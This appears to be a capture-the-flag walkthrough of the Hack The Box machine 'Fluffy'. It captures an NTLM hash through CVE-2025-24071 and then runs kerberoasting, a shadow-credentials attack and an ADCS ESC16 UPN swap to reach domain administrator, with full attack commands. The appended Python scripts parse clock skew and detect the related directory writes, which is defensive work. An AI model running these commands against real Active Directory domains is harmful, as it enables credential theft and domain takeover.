# TAKEAWAYS

- Fixing clock skew with `rdate` to sync with DC

```bash
sudo rdate -n DC_IP
COMMAND
```

- If above does not work, try `faketime`

```bash
ntpdate -q DC_IP
faketime "INSERT_TIME_FROM_ABOVE" COMMAND
faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" COMMAND
```

- Enumerate ADCS

```bash
nxc ldap DC_IP -u winrm_svc -H NThash -d domain -M adcs
```

- Enumerate ADCS vulns

```bash
certipy-ad find -u username -hashes hash -dc-ip 10.129.4.254 -ns 10.129.4.254 -vulnerable -stdout
```

---

# Discover Ports & Services

- add given creds to `creds.txt` for easy reference
- `ping` test

![[images/Pasted image 20260314153652.png]]

- `nmap` scan - light

![[images/Pasted image 20260314153956.png]]

- Looks like a DC b/c dns, kerberos, ldap, winrm are open
- `nmap` scan - detailed

![[images/Pasted image 20260314154212.png]]

- NOTE: large clock skew

![[images/Pasted image 20260314154444.png]]

- NOTE: SMB signing enabled and required

![[images/Pasted image 20260314154903.png]]

- visualize `nmap` scan

![[images/Pasted image 20260314154940.png]]

```bash
xsltproc input.xml -o output.html
```

---

# Port 445: SMB Enum

- Null auth works but we cannot list shares

![[images/Pasted image 20260314155157.png]]
![[images/Pasted image 20260314160316.png]]

- Add `fluffy.htb` and `DC01.fluffy.htb` to `/etc/hosts`
- Try with given creds

![[images/Pasted image 20260314202229.png]]

- Clearly the IT share is the next to look into as it's a non-default share
- Connect to IT share with `smbclient`

![[images/Pasted image 20260314202419.png]]

- Few interesting files here > Let's grab it all with `mget *`

![[images/Pasted image 20260314202522.png]]

- `UpgradeNotice.pdf` notes some critical CVEs that will be patched soon

![[images/Pasted image 20260315170657.png]]

- Google the two critical and two high CVEs
    - CVE-2025-24996 NTLM hash disclosure relating to spoofing attacks
    - CVE-2025-24071 NTLM hash disclosure following RAR/ZIP extraction
        - NOTE: I am able to PUT a file into the IT share
    - CVE-2025-46785 is related to the Zoom app
    - CVE-2025-29968 is related to ADCS
- After unzipping `Everything[xxx].zip` and `KeePass[xxx].zip`, I only see executables and related files

![[images/Pasted image 20260314202959.png]]

- Only return to this if we are at a dead-end

---

# Exploit CVE-2025-24071

- Startup `responder`

![[images/Pasted image 20260314205106.png]]

- Create a `.zip` file with a `.library-ms` file that points to `\\attacker-ip\shared`

![[images/Pasted image 20260314205837.png]]

- and PUT into the IT share > no hits on responder

![[images/Pasted image 20260314210546.png]]

- Let's try this tool: [CVE-2025-24071/exploit.py at main · ThemeHackers/CVE-2025-24071](https://github.com/ThemeHackers/CVE-2025-24071/blob/main/exploit.py)
- Above tool creates the malicious `.zip` for us with `exploit.py`

![[images/Pasted image 20260314210749.png]]

- PUT `exploit.zip` via `smbclient` > we have a hit on `responder` with the NTLMv2 hash for `p.agila`

![[images/Pasted image 20260314211345.png]]
![[images/Pasted image 20260314210945.png]]

- copy this hash to `p.agila.hash` and attempt to crack with `hashcat -m 5600` > cracked!
![[images/Pasted image 20260314211208.png]]

- create a new entry in `creds.txt` for `p.agila`

---

# Enum with `p.agila`

## SMB and RPC Enum

- Enumerate available shares > same as initial user

![[images/Pasted image 20260314211714.png]]

- Try to find more users with `nxc`

![[images/Pasted image 20260314211914.png]]

- Enumerate domain users with `rpcclient`

![[images/Pasted image 20260314212147.png]]

- Enumerate privs > no output

```bash
nxc smb 10.129.232.88 -u <USERNAME> -p <PASSWORD> -X "whoami /priv"
```

- Try with `evil-winrm` > getting an error

![[images/Pasted image 20260314212704.png]]

## Bloodhound enum

- Let's run `bloodhound`
- Run ingestor

![[images/Pasted image 20260314213109.png]]

- Startup GUI container

![[images/Pasted image 20260314213115.png]]

- Keep getting ingestion canceled

![[images/Pasted image 20260314214228.png]]

- try `bloodhound.py` with `-c all --zip` option

![[images/Pasted image 20260314215224.png]]

- that seems to work

![[images/Pasted image 20260314215244.png]]

- `p.agila` is a member of `SERVICE ACCOUNT MANAGERS` and has outbound object control over `SERVICE ACCOUNTS`

![[images/Pasted image 20260314215457.png]]

- `SERVICE ACCOUNTS` has GenericWrite over `CA_SVC` and others

![[images/Pasted image 20260314215550.png]]

- `CA_SVC` is a member of `CERT PUBLISHERS`, which is a member of the `DENIED RODC PASSWORD REPLICATION GROUP`

![[images/Pasted image 20260315151756.png]]

- RODC = read-only domain controllers

---

# Kerberoasting

- Since SERVICE ACCOUNTS has GenericWrite over the `WINRM_SVC` account we can perform a targeted kerberoasting attack

![[images/Pasted image 20260314220720.png]]

- Try using `GetUserSPNs.py`

![[images/Pasted image 20260314221036.png]]

- Clock skew too great
- Install `rdate` and run

```bash
sudo apt install rdate
sudo rdate -n DC_IP
```

- Clock skew is still too great
- Try using `faketime`

```bash
sudo apt install faketime
ntpdate -q 10.129.232.88
# the time string below is based on the ntpdate output above
faketime "2026-03-15 05:16:26" GetUserSPNs.py -dc-ip 10.129.232.88 fluffy.htb/p.agila -request-user winrm_svc -outputfile winrm_svc.hash
```

- This gives us TGS tickets for `LDAP_SVC`, `CA_SVC`, `WINRM_SVC`

![[images/Pasted image 20260314221956.png]]

- Output to `svc.hash` and try to crack with `hashcat -m 13100` - exhausted

---

# Shadow Creds Attack

- Try shadow creds attack based on bloodhound hints above
- First, add `p.agila` to SERVICE ACCOUNTS

```bash
bloodyAD -u p.agila -p <password> -d fluffy.htb --host TARGET add groupMember "service accounts" p.agila
```

![[images/Pasted image 20260315152449.png]]

- Next, extract NT hashes for `winrm_svc` and `ca_svc` with shadow creds attacks
- That works! > Note: The membership for `p.agila` seems to be clearing every several minutes, so the above `bloodyAD` command may need to be redone
- Save hashes to `services.hash`

```bash
faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username p.agila@fluffy.htb -password <password> -account winrm_svc
faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username p.agila@fluffy.htb -password <password> -account ca_svc
```

- Finally, perform a PtH to connect to `DC01.fluffy.htb` as `winrm_svc` with `evil-winrm`
- `type \users\winrm_svc\desktop\user.txt`

---

# Enumerate ADCS

- Enumerate ADCS info with `nxc`

```bash
nxc ldap DC_IP -u winrm_svc -H NThash -d fluffy.htb -M adcs
```

![[images/Pasted image 20260315155519.png]]

- Enumerate ADCS vulns with `certipy-ad`
- Below we see that `DC01.fluffy.htb` is vulnerable to an ESC16 exploit b/c the security extension `1.3.6.1.4.1.311.25.2` is disabled

```bash
faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad find -u ca_svc -hashes hash -dc-ip 10.129.4.254 -ns 10.129.4.254 -vulnerable -stdout
```

![[images/Pasted image 20260315162947.png]]

---

# Exploit ESC16 Vulnerability

- See https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally

## Sequence of Steps

- Step 1: Read initial UPN of the victim account

```bash
faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad account -u p.agila@fluffy.htb -p "password" -dc-ip 10.129.4.254 -ns 10.129.4.254 -user ca_svc read
```

![[images/Pasted image 20260315164300.png]]

- Step 2: Update the victim account's UPN to the target administrator's `sAMAccountName`

```bash
faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad account -u p.agila@fluffy.htb -p "password" -dc-ip 10.129.4.254 -ns 10.129.4.254 -upn administrator -user ca_svc update
```

![[images/Pasted image 20260315164506.png]]

- Step 3: Request a certificate as the "victim" user from any suitable client authentication template

```bash
export KRB5CCNAME=ca_svc.ccache
faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad req -u ca_svc -hashes "hash" -dc-ip 10.129.4.254 -target dc01.fluffy.htb -ca 'fluffy-dc01-ca' -template 'User'
```

![[images/Pasted image 20260315165435.png]]

- Step 4: Revert the "victim" account's UPN

```bash
faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad account update -u p.agila@fluffy.htb -p "password" -dc-ip 10.129.4.254 -ns 10.129.4.254 -upn "ca_svc@fluffy.htb" -user ca_svc
```

![[images/Pasted image 20260315165719.png]]

- Step 5: Authenticate as the target administrator - Got it!

```bash
faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.4.254 -ns 10.129.4.254
```

![[images/Pasted image 20260315165905.png]]

- Perform a PtH to connect to `DC01.fluffy.htb` as `administrator` with `evil-winrm`
- `type \users\administrator\desktop\root.txt`

![[images/Pasted image 20260315170109.png]]
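The clock-skew workaround used throughout these notes (`faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)"`) depends on the shape of `ntpdate -q` output. The script below is an added example, not part of the original notes or of any tool named in them: it parses that output, reports whether the offset is outside the five-minute window Kerberos tolerates, and builds the same `faketime` prefix the `cut` pipeline produces. It assumes the ntpsec-style one-line-per-server format that current Kali prints (date, time, UTC offset in parentheses, clock offset in seconds, error bound, server); the sample line is constructed.

```python
"""Read `ntpdate -q` output, check Kerberos clock skew, build the faketime prefix.

Added example, not code from the original notes. Assumes the ntpsec `ntpdate -q`
output format (one line per server), e.g.:
    2026-03-15 05:16:26.123456 (+0000) +24845.731 +/- 0.021 10.129.232.88 s3 no-leap
where the fourth field is the remote clock minus the local clock, in seconds.
"""
import re
from dataclasses import dataclass

# Kerberos rejects an authenticator when the clocks differ by more than this (KRB_AP_ERR_SKEW).
KERBEROS_MAX_SKEW_SECONDS = 300

# Constructed sample of `ntpdate -q 10.129.232.88` output; the DC reads ~6.9 hours ahead of us.
SAMPLE_NTPDATE_OUTPUT = (
    "2026-03-15 05:16:26.123456 (+0000) +24845.731 +/- 0.021 10.129.232.88 s3 no-leap\n"
)

# date, time[.fraction], (utc offset), clock offset, "+/-", error bound, server ...
_LINE_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2})(?:\.\d+)? "
    r"\((?P<tz>[+-]\d{4})\) (?P<offset>[+-]?\d+(?:\.\d+)?) \+/- \S+ (?P<server>\S+)"
)


@dataclass
class NtpReading:
    server: str
    remote_time: str       # "YYYY-MM-DD HH:MM:SS", the form faketime(1) accepts
    offset_seconds: float  # remote clock minus local clock


def parse_ntpdate(output: str) -> NtpReading:
    """Return the first server reading found in `ntpdate -q` output."""
    for line in output.splitlines():
        m = _LINE_RE.match(line.strip())
        if m:
            return NtpReading(m["server"], f"{m['date']} {m['time']}", float(m["offset"]))
    raise ValueError("no ntpsec-style ntpdate line found in output")


def skew_exceeds_kerberos_tolerance(reading: NtpReading,
                                    tolerance: float = KERBEROS_MAX_SKEW_SECONDS) -> bool:
    """True when the KDC will refuse this host's requests until the clocks are reconciled."""
    return abs(reading.offset_seconds) > tolerance


def faketime_argv(reading: NtpReading, command: list) -> list:
    """Wrap a command the way the notes do with faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)".

    The cut pipeline keeps the fractional seconds; dropping them here changes nothing for
    Kerberos, which only needs the request to land inside the five-minute window.
    """
    return ["faketime", reading.remote_time, *command]


if __name__ == "__main__":
    reading = parse_ntpdate(SAMPLE_NTPDATE_OUTPUT)
    print(f"DC {reading.server} reports {reading.remote_time}, offset {reading.offset_seconds:+.3f}s")
    if skew_exceeds_kerberos_tolerance(reading):
        print("skew exceeds Kerberos tolerance; run tools as:",
              " ".join(faketime_argv(reading, ["GetUserSPNs.py", "fluffy.htb/p.agila"])))
```

On a real engagement, feed `subprocess.run(["ntpdate", "-q", dc_ip], capture_output=True, text=True).stdout` into `parse_ntpdate`; the check also tells a defender how far a DC has drifted, which is worth alerting on in its own right since large skew breaks Kerberos for legitimate clients too.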
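Both the shadow-credentials step and ESC16 steps 2 and 4 leave attribute writes on the victim account that a domain owner can alert on: a `msDS-KeyCredentialLink` value added by someone other than the account itself, and a `userPrincipalName` rewritten to another principal's bare `sAMAccountName` (then reverted). The detection below is an added example, not code from the original notes or from Certipy; it assumes Directory Service Changes auditing (Security Event 5136) is enabled on the DC and that events have been normalised into dicts with the fields shown. The account map and the event records are constructed around the accounts these notes name.

```python
"""Flag the 5136 attribute writes left behind by shadow credentials and the ESC16 UPN swap.

Added example, not code from the original notes. Assumes Event 5136 (Directory Service
Changes) records normalised to: subject (SubjectUserName), object (ObjectDN),
attr (AttributeLDAPDisplayName), op (OperationType as add/delete), value (AttributeValue).
"""
from dataclasses import dataclass

# sAMAccountName -> distinguished name, as exported from the directory (constructed).
KNOWN_ACCOUNTS = {
    "administrator": "CN=Administrator,CN=Users,DC=fluffy,DC=htb",
    "ca_svc": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb",
    "winrm_svc": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb",
    "p.agila": "CN=p.agila,CN=Users,DC=fluffy,DC=htb",
}

# Constructed 5136-style records covering the steps in the notes plus one benign change.
SAMPLE_EVENTS = [
    # Shadow credentials: a key credential written to ca_svc by a different user.
    {"time": "2026-03-15T15:24:49Z", "subject": "p.agila", "object": KNOWN_ACCOUNTS["ca_svc"],
     "attr": "msDS-KeyCredentialLink", "op": "add", "value": "B:828:<constructed key credential blob>"},
    # ESC16 step 2: the victim's UPN rewritten to another principal's bare sAMAccountName.
    {"time": "2026-03-15T16:45:06Z", "subject": "p.agila", "object": KNOWN_ACCOUNTS["ca_svc"],
     "attr": "userPrincipalName", "op": "add", "value": "administrator"},
    # ESC16 step 4: the UPN reverted to the account's own name; this should stay quiet.
    {"time": "2026-03-15T16:57:19Z", "subject": "p.agila", "object": KNOWN_ACCOUNTS["ca_svc"],
     "attr": "userPrincipalName", "op": "add", "value": "ca_svc@fluffy.htb"},
    # Routine attribute change by an administrator; no alert expected.
    {"time": "2026-03-15T17:02:00Z", "subject": "administrator", "object": KNOWN_ACCOUNTS["winrm_svc"],
     "attr": "description", "op": "add", "value": "WinRM service account"},
]


@dataclass
class Alert:
    rule: str
    subject: str
    object_dn: str
    detail: str


def sam_for_dn(dn, known_accounts=KNOWN_ACCOUNTS):
    """Reverse-map an object DN to its sAMAccountName ('' if unknown)."""
    for sam, known_dn in known_accounts.items():
        if known_dn.lower() == dn.lower():
            return sam
    return ""


def detect(events, known_accounts=KNOWN_ACCOUNTS):
    """Return one Alert per suspicious attribute write found in the records."""
    alerts = []
    for ev in events:
        if ev["op"] != "add":
            continue
        attr = ev["attr"].lower()
        target_sam = sam_for_dn(ev["object"], known_accounts)

        if attr == "msds-keycredentiallink":
            # Key credentials are normally enrolled by the account itself (Windows Hello for
            # Business, device join); another user writing one is the shadow-credentials pattern.
            if ev["subject"].lower() != target_sam.lower():
                alerts.append(Alert("shadow-credential", ev["subject"], ev["object"],
                                    f"msDS-KeyCredentialLink written by {ev['subject']}"))

        elif attr == "userprincipalname":
            upn = ev["value"]
            local, _, suffix = upn.partition("@")
            other_dn = known_accounts.get(local.lower())
            if other_dn is not None and other_dn.lower() != ev["object"].lower():
                # The UPN now resolves to a different account: the state ESC16 step 2 creates.
                rule, detail = "upn-collision", f"UPN {upn!r} resolves to account {local!r}"
            elif not suffix:
                rule, detail = "upn-no-suffix", f"UPN {upn!r} has no domain suffix"
            else:
                continue
            alerts.append(Alert(rule, ev["subject"], ev["object"], detail))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.subject} -> {a.object_dn}: {a.detail}")
```

Run against the sample, the two hits both name `p.agila` writing to `ca_svc`, which is exactly the GenericWrite path Bloodhound surfaced above; the revert in step 4 is deliberately silent, so correlating a `upn-collision` alert with a later write to the same attribute is what reveals the full swap-and-restore sequence. The ESC16 exposure itself is fixed at the CA by removing `1.3.6.1.4.1.311.25.2` from its disabled-extension list, as the linked Certipy wiki page describes.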